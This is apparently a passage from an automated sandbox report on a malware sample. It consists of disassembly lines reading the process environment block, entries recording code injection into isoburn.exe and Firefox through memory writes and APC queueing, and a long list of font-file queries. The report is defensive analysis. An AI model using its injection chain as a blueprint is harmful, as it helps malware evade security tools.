            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015927ED mov eax, dword ptr fs:[00000030h]2_2_015927ED
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015927ED mov eax, dword ptr fs:[00000030h]2_2_015927ED
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015927ED mov eax, dword ptr fs:[00000030h]2_2_015927ED
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015FE7E1 mov eax, dword ptr fs:[00000030h]2_2_015FE7E1
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161678E mov eax, dword ptr fs:[00000030h]2_2_0161678E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015707AF mov eax, dword ptr fs:[00000030h]2_2_015707AF
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163866E mov eax, dword ptr fs:[00000030h]2_2_0163866E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163866E mov eax, dword ptr fs:[00000030h]2_2_0163866E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158C640 mov eax, dword ptr fs:[00000030h]2_2_0158C640
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A2674 mov eax, dword ptr fs:[00000030h]2_2_015A2674
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AA660 mov eax, dword ptr fs:[00000030h]2_2_015AA660
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AA660 mov eax, dword ptr fs:[00000030h]2_2_015AA660
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2619 mov eax, dword ptr fs:[00000030h]2_2_015B2619
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158260B mov eax, dword ptr fs:[00000030h]2_2_0158260B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158260B mov eax, dword ptr fs:[00000030h]2_2_0158260B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158260B mov eax, dword ptr fs:[00000030h]2_2_0158260B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158260B mov eax, dword ptr fs:[00000030h]2_2_0158260B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158260B mov eax, dword ptr fs:[00000030h]2_2_0158260B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158260B mov eax, dword ptr fs:[00000030h]2_2_0158260B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158260B mov eax, dword ptr fs:[00000030h]2_2_0158260B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EE609 mov eax, dword ptr fs:[00000030h]2_2_015EE609
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A6620 mov eax, dword ptr fs:[00000030h]2_2_015A6620
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A8620 mov eax, dword ptr fs:[00000030h]2_2_015A8620
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157262C mov eax, dword ptr fs:[00000030h]2_2_0157262C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158E627 mov eax, dword ptr fs:[00000030h]2_2_0158E627
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AA6C7 mov ebx, dword ptr fs:[00000030h]2_2_015AA6C7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AA6C7 mov eax, dword ptr fs:[00000030h]2_2_015AA6C7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EE6F2 mov eax, dword ptr fs:[00000030h]2_2_015EE6F2
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EE6F2 mov eax, dword ptr fs:[00000030h]2_2_015EE6F2
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EE6F2 mov eax, dword ptr fs:[00000030h]2_2_015EE6F2
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EE6F2 mov eax, dword ptr fs:[00000030h]2_2_015EE6F2
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F06F1 mov eax, dword ptr fs:[00000030h]2_2_015F06F1
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F06F1 mov eax, dword ptr fs:[00000030h]2_2_015F06F1
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01574690 mov eax, dword ptr fs:[00000030h]2_2_01574690
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01574690 mov eax, dword ptr fs:[00000030h]2_2_01574690
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A66B0 mov eax, dword ptr fs:[00000030h]2_2_015A66B0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AC6A6 mov eax, dword ptr fs:[00000030h]2_2_015AC6A6
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F0946 mov eax, dword ptr fs:[00000030h]2_2_015F0946
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01614978 mov eax, dword ptr fs:[00000030h]2_2_01614978
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01614978 mov eax, dword ptr fs:[00000030h]2_2_01614978
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015FC97C mov eax, dword ptr fs:[00000030h]2_2_015FC97C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B096E mov eax, dword ptr fs:[00000030h]2_2_015B096E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B096E mov edx, dword ptr fs:[00000030h]2_2_015B096E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B096E mov eax, dword ptr fs:[00000030h]2_2_015B096E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01596962 mov eax, dword ptr fs:[00000030h]2_2_01596962
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01596962 mov eax, dword ptr fs:[00000030h]2_2_01596962
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01596962 mov eax, dword ptr fs:[00000030h]2_2_01596962
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Memory written: C:\Users\user\Desktop\WrrCV4QR2J.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\isoburn.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6BF500000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Section loaded: unknown target: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Section loaded: unknown target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: unknown target: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe protection: read write
            Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: unknown target: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\isoburn.exe Thread APC queued: target process: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
            Source: C:\Windows\SysWOW64\isoburn.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6BF500000
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Process created: C:\Users\user\Desktop\WrrCV4QR2J.exe C:\Users\user\Desktop\WrrCV4QR2J.exe
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe Process created: C:\Windows\SysWOW64\isoburn.exe C:\Windows\SysWOW64\isoburn.exe
            Source: C:\Windows\SysWOW64\isoburn.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: UHPrrMeffyCaz.exe, 00000003.00000000.1714375037.0000000001120000.00000002.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000003.00000002.4120941412.0000000001120000.00000002.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000000.1846320823.0000000001090000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: UHPrrMeffyCaz.exe, 00000003.00000000.1714375037.0000000001120000.00000002.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000003.00000002.4120941412.0000000001120000.00000002.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000000.1846320823.0000000001090000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: UHPrrMeffyCaz.exe, 00000003.00000000.1714375037.0000000001120000.00000002.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000003.00000002.4120941412.0000000001120000.00000002.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000000.1846320823.0000000001090000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: UHPrrMeffyCaz.exe, 00000003.00000000.1714375037.0000000001120000.00000002.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000003.00000002.4120941412.0000000001120000.00000002.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000000.1846320823.0000000001090000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Queries volume information: C:\Users\user\Desktop\WrrCV4QR2J.exe VolumeInformation
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Speech\v4.0_4.0.0.0__31bf3856ad364e35\System.Speech.dll VolumeInformation
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
